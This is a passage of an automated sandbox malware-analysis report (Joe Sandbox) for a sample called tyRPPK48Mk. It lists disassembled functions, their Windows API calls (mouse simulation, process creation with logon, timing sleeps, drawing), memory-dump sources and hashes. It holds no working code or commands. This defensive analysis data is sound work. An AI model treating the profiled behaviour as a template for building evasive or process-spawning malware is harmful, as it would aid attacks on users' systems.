                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 642888154-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441FD6 Relevance: 9.1, APIs: 6, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00441FEB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043137E: GetWindowRect.USER32(?,?), ref: 00431399
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00442013
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0044201A
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 00442049
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00442078
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004420E4
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4137160315-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 269498413448c1b0457bf7b9883effbdcf17ebc276120b60b0d95eb2daedcabf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA31A372104306AFE710CF54CD85E6BB7E9FF98304F00092DF94597281E6B5EA05CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2487901850-572801152
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004438E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 004438F8
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044390C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcstok.LIBCMT ref: 00443931
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3632110297-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436E94 Relevance: 9.1, APIs: 6, Instructions: 75processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00436EED
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1413079979-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dd31e3d5ef53dadf09d6f4902918c4fef8fb0ebcc20249036383472598af8dfc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10214C7620020AABDB14CF69DD59EEB37ADEB8D310F15851AFD05A3250C775EC12CB64
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 372113273-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041708E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 004170BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 004170EE
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(009C2CE0), ref: 00417106
